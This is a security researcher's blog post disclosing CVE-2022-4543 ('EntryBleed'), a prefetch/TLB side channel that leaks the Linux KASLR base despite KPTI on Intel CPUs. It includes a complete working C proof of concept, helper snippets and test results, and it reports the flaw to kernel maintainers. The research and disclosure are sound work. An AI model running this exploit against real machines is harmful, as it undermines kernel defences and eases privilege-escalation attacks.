Friday, December 16, 2022

EntryBleed: Breaking KASLR under KPTI with Prefetch (CVE-2022-4543)

Recently, I discovered that Linux KPTI has implementation issues that allow any unprivileged local attacker to bypass KASLR on Intel-based systems. While technically only an info-leak, it still provides a primitive with serious implications for bugs previously considered too hard to exploit, and it was assigned CVE-2022-4543. For reasons that will become clear later in this writeup, I have decided to name this attack “EntryBleed.”

KPTI (originally named KAISER) stands for Kernel Page Table Isolation. It was introduced a few years ago as a patch for the Meltdown micro-architectural vulnerability, in which unprivileged attackers could use a side channel to read kernel memory. According to the documentation, KPTI splits the user and kernel page tables for each process. The kernel still has all of userspace virtual memory mapped in, but with the NX bit set; userspace, on the other hand, only has the minimal amount of kernel virtual memory mapped in, such as exception/syscall entry handlers and anything else necessary for the user-to-kernel transition. KAISER actually stood for “Kernel Address Isolation to have Side-channels Efficiently Removed” and predates Meltdown, as other side-channel KASLR bypasses were already known to be an issue. If part of KPTI’s purpose is to act as a barrier against CPU side-channel KASLR bypasses, then clearly it has failed as of this post.
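As an aside, whether KPTI is actually enabled on a given machine can be checked from userspace. Here is a minimal sketch (not part of the attack) that reads the standard sysfs Meltdown entry, which reports "Mitigation: PTI" when page table isolation is active:

#include <stdio.h>

/* Quick check for whether KPTI is active: on kernels exposing the standard
 * sysfs vulnerability files, the Meltdown entry reads "Mitigation: PTI"
 * when page table isolation is enabled. */
int main(void) {
    char buf[256] = {0};
    FILE *f = fopen("/sys/devices/system/cpu/vulnerabilities/meltdown", "r");
    if (!f) {
        puts("no sysfs vulnerability interface (very old kernel?)");
        return 1;
    }
    if (fgets(buf, sizeof(buf), f))
        printf("meltdown: %s", buf);   /* e.g. "Mitigation: PTI" */
    fclose(f);
    return 0;
}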

In 2016, Daniel Gruss introduced the concept of the prefetch side channel. I used one variant of it, which specifically abuses the TLB (the caching mechanism for virtual to physical address translations) as the side-channel mechanism. x86_64 has a group of prefetch instructions, which “prefetch” addresses into the CPU cache. A prefetch will finish quickly if the address being loaded is already present in the TLB, but will finish more slowly when the address is not present (and a page table walk needs to be done). At the time, it was already known that ASLR (and KASLR) could be bypassed by timing prefetches across a candidate range of addresses using high-resolution timing instructions like RDTSC.
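To illustrate the primitive, timing a single prefetch might look like the sketch below. This is just a conceptual version using compiler intrinsics, not the measurement routine from the prefetch paper that the actual exploit further down uses:

#include <stdint.h>
#include <x86intrin.h>   /* __rdtscp, _mm_prefetch, _mm_mfence, _mm_lfence */

/* Conceptual sketch: time one prefetch of an arbitrary address. If the
 * translation for addr is already in the TLB, the prefetch tends to finish
 * faster; if a page table walk is required, it takes measurably longer. */
static inline uint64_t time_prefetch(const void *addr) {
    unsigned int aux;
    _mm_mfence();
    uint64_t start = __rdtscp(&aux);
    _mm_lfence();
    _mm_prefetch((const char *)addr, _MM_HINT_NTA);
    _mm_lfence();
    uint64_t end = __rdtscp(&aux);
    _mm_mfence();
    return end - start;
}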

Before I continue with the attack, I should note that my main inspiration came from Google ProjectZero’s recent blogpost on exploiting CVE-2022-42703. In its final section, they discuss how KPTI has been left disabled on more modern CPUs that have Meltdown mitigations in silicon, which makes them vulnerable to prefetch attacks again. In that case, one would just assume, “Ok, let me enable KPTI again then.” To quote the post: “kPTI was helpful in mitigating this side channel,” which would make perfect sense given the purpose of KPTI/KAISER, and seemed to be the consensus among the few other security researcher friends I talked to.

For whatever reason, I had a gut feeling that something was wrong. I thought that maybe the minimal subset of kernel code that stays mapped while userspace code is running could be located with prefetch techniques. After an hour of digging, I noticed the following. In syscall_init, the address of entry_SYSCALL_64 (which sits at a constant offset from the KASLR base, according to /proc/kallsyms) is written into the LSTAR MSR, which holds the address of the kernel’s handler for 64-bit syscalls. Notice how the handler executes a few instructions before switching to the kernel CR3 (if KPTI is on) - this means the function must still be mapped in the userspace page tables. I then performed a manual page table walk in a debugger using the user CR3, and it turns out that entry_SYSCALL_64 is mapped at the same KASLR-rebased address in userland as it is in the kernel - which sounds very suspicious!
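As a sanity check (not part of the attack itself), the constant offset can be confirmed on a box where you already have root by diffing the two symbols in /proc/kallsyms. A small sketch, assuming kptr_restrict allows real addresses to be shown:

#include <stdio.h>
#include <string.h>

/* Sanity-check sketch (requires root / kptr_restrict=0): parse /proc/kallsyms
 * and print entry_SYSCALL_64's offset from startup_64 (the KASLR base).
 * This is the value used as entry_SYSCALL_64_offset in the exploit below. */
int main(void) {
    FILE *f = fopen("/proc/kallsyms", "r");
    if (!f) return 1;

    unsigned long base = 0, entry = 0;
    char line[512];
    while (fgets(line, sizeof(line), f)) {
        unsigned long addr;
        char type, name[256];
        if (sscanf(line, "%lx %c %255s", &addr, &type, name) != 3)
            continue;
        if (!strcmp(name, "startup_64"))       base  = addr;
        if (!strcmp(name, "entry_SYSCALL_64")) entry = addr;
    }
    fclose(f);

    if (!base || !entry) {
        puts("symbols unreadable (kptr_restrict?)");
        return 1;
    }
    printf("entry_SYSCALL_64_offset = 0x%lx\n", entry - base);
    return 0;
}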

At this point, I was quite confident that a prefetch side-channel could reveal the location of entry_SYSCALL_64, and since it seemed to be slid with the rest of the kernel, the KASLR base as well. The overall idea is just to repeatedly execute syscalls to ensure that the page with entry_SYSCALL_64 (hence the name EntryBleed) gets cached in the instruction TLB, and then prefetch side-channel the possible range of addresses for that handler (as the kernel itself is guaranteed to be within 0xffffffff80000000 - 0xffffffffc0000000). 

An astute reader might wonder how the TLB entry is preserved upon returning to userland, despite the CR3 write when switching to kernel page tables. This is most likely due to the global bit being set on this page's page table entry, which protects it from the TLB invalidation triggered by mov instructions to CR3. In fact, the PTI documentation says the following: "global pages are disabled for all kernel structures not mapped into both kernel and userspace page tables." I originally suspected that PCID (which introduces separate TLB contexts, identified by the lower 12 bits of CR3, to reduce the need for invalidation) was the root cause, as it often appears in discussions about the performance of Meltdown mitigations, but the KPTI CR3 bitmask shows no modifications to PCID. Perhaps I'm misunderstanding the code, so it would be great if someone could correct me if I'm wrong here.

Anyway, the resulting bypass is extremely simple. Unlike some other uarch attacks, it seems to work fine under normal load on normal systems, and I can deduce the KASLR base on systems with KPTI with almost complete accuracy by just averaging 100 iterations. Note that the measurement code itself is from the original prefetch paper, with cpuid swapped out for a fence instruction so it works in VMs (credit goes to p0 for that technique). Below is my code (entry_SYSCALL_64_offset has to be adjusted per kernel by setting it to the distance between entry_SYSCALL_64 and startup_64):

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>

#define KERNEL_LOWER_BOUND 0xffffffff80000000ull
#define KERNEL_UPPER_BOUND 0xffffffffc0000000ull
#define entry_SYSCALL_64_offset 0x400000ull

/* Time a pair of prefetches against addr, bracketed by rdtscp and fences.
 * Measurement routine from the original prefetch paper, with cpuid swapped
 * out for fences so it also works inside VMs. */
uint64_t sidechannel(uint64_t addr) {
    uint64_t a, b, c, d;
    asm volatile (".intel_syntax noprefix;"
        "mfence;"
        "rdtscp;"
        "mov %0, rax;"
        "mov %1, rdx;"
        "xor rax, rax;"
        "lfence;"
        "prefetchnta qword ptr [%4];"
        "prefetcht2 qword ptr [%4];"
        "xor rax, rax;"
        "lfence;"
        "rdtscp;"
        "mov %2, rax;"
        "mov %3, rdx;"
        "mfence;"
        ".att_syntax;"
        : "=r" (a), "=r" (b), "=r" (c), "=r" (d)
        : "r" (addr)
        : "rax", "rbx", "rcx", "rdx");
    a = (b << 32) | a;
    c = (d << 32) | c;
    return c - a;
}

#define STEP 0x100000ull
#define SCAN_START (KERNEL_LOWER_BOUND + entry_SYSCALL_64_offset)
#define SCAN_END (KERNEL_UPPER_BOUND + entry_SYSCALL_64_offset)

#define DUMMY_ITERATIONS 5
#define ITERATIONS 100
#define ARR_SIZE ((SCAN_END - SCAN_START) / STEP)

uint64_t leak_syscall_entry(void)
{
    uint64_t data[ARR_SIZE] = {0};
    uint64_t min = ~0, addr = ~0;

    for (int i = 0; i < ITERATIONS + DUMMY_ITERATIONS; i++)
    {
        for (uint64_t idx = 0; idx < ARR_SIZE; idx++)
        {
            uint64_t test = SCAN_START + idx * STEP;
            syscall(104);                       /* keep entry_SYSCALL_64 hot in the TLB */
            uint64_t time = sidechannel(test);
            if (i >= DUMMY_ITERATIONS)          /* discard warm-up rounds */
                data[idx] += time;
        }
    }

    /* The candidate with the lowest average prefetch time is the mapped one. */
    for (int i = 0; i < ARR_SIZE; i++)
    {
        data[i] /= ITERATIONS;
        if (data[i] < min)
        {
            min = data[i];
            addr = SCAN_START + i * STEP;
        }
        printf("%llx %ld\n", (SCAN_START + i * STEP), data[i]);
    }

    return addr;
}

int main()
{
    printf("KASLR base %llx\n", leak_syscall_entry() - entry_SYSCALL_64_offset);
}

KASLR bypassed on systems with KPTI in less than 100 lines of C!

I’ve managed to get this working on multiple Intel CPUs (including an i5-8265U, i7-8750H, i7-9700F, i7-9750H, and a Xeon E5-2640) - I got it working on some VPS instances too, but was unable to figure out the Intel CPU model there. It seems to work across a wide range of kernel versions with KPTI - I’ve tested it on Arch 6.0.12-hardened1-1-hardened, Ubuntu 5.15.0-56-generic, 6.0.12-1-MANJARO, 5.10.0-19-amd64, and a custom 5.18.3 build. It also works in KVM guests to leak the guest OS KASLR base (though one would need to forward the host CPU features with "-cpu host" in QEMU for prefetch to work at all). I'm not sure how the TLB side effects are preserved across CR3 writes and potential VM exits in the VM scenario, though - if anyone has ideas, please let me know! As of now, I don’t think this attack affects AMD, but I also don't have direct access to any AMD hardware (see the edit at the end). Lastly, I don't believe the repeated syscalls are strictly necessary: later tests showed the attack working without issuing one before each measurement, most likely due to the global bit, but I kept them in the exploit to guarantee the entry's presence in the TLB.

Here is a demonstration of it (kernel base is printed before the shell for comparison purposes): 

One thing that could be done to increase reliability is to access many userspace addresses at specific strides beforehand to evict the TLB (and avoid false positives from other cached kernel addresses, which I saw more frequently on some systems); a rough sketch of such an eviction pass is included below. I also hypothesize that in scenarios without KPTI (like in ProjectZero’s case), prefetch would work even better if one triggered a specific codepath in the kernel and specifically hunted for that offset during the side channel.
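For reference, such an eviction pass could be as simple as touching a large anonymous mapping page by page before each measurement round. A rough sketch follows; the buffer size and stride here are illustrative guesses, not tuned values:

#include <stddef.h>
#include <stdint.h>
#include <sys/mman.h>

/* Rough sketch of a TLB eviction pass: touch every page of a large anonymous
 * mapping so that capacity pressure pushes stale translations (including
 * cached kernel ones) out of the TLB. 64 MiB and a 4 KiB stride are guesses. */
#define EVICT_SIZE   (64ull << 20)
#define EVICT_STRIDE 0x1000ull

static void evict_tlb(void) {
    static volatile uint8_t *buf;
    if (!buf)
        buf = mmap(NULL, EVICT_SIZE, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED)
        return;
    for (uint64_t off = 0; off < EVICT_SIZE; off += EVICT_STRIDE)
        buf[off] += 1;   /* write so each page is faulted in and translated */
}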

In conclusion, Linux KPTI doesn’t do its job, and it’s still quite easy to get the KASLR base. I’ve already emailed security@kernel.org as well as the relevant distro mailing lists, and was authorized to disclose this since a proper fix might take a while. I’m honestly not sure what the best fix is, as this is more of an implementation issue, but I suggested either randomizing the virtual address of the entry/exit handlers mapped into userspace separately from the rest of the kernel, mapping them at a fixed virtual address unrelated to the kernel base, or giving them a randomized offset from the kernel base. I suspect that this problem might really just be due to a major oversight; one kernel developer mentioned to me that this was definitely not the intent and might have been a regression.

I’ll end this post with some acknowledgements. A huge shoutout must go to my uarch security mentor Joseph Ravichandran from MIT CSAIL for guiding me throughout this field of research and advising me a lot on this bug. He introduced me to prefetch attacks through the Secure Hardware Design course from Professor Mengjia Yan - one of their final labs is actually about bypassing userland ASLR using prefetch. Thanks must go to Seth Jenkins at ProjectZero for the original inspiration too, and D3v17 for his support and extensive testing. As always, feel free to ask questions or point out any mistakes in my explanations!

Edit (12/18/2022): As bcoles later informed me, a generic prefetch attack seems to work for some AMD CPUs, which isn't surprising given this paper and this security advisory. However, it's also important to note that this would basically be the same attack as ProjectZero discussed originally, as AMD was not affected by Meltdown so KPTI was never enabled for their processors.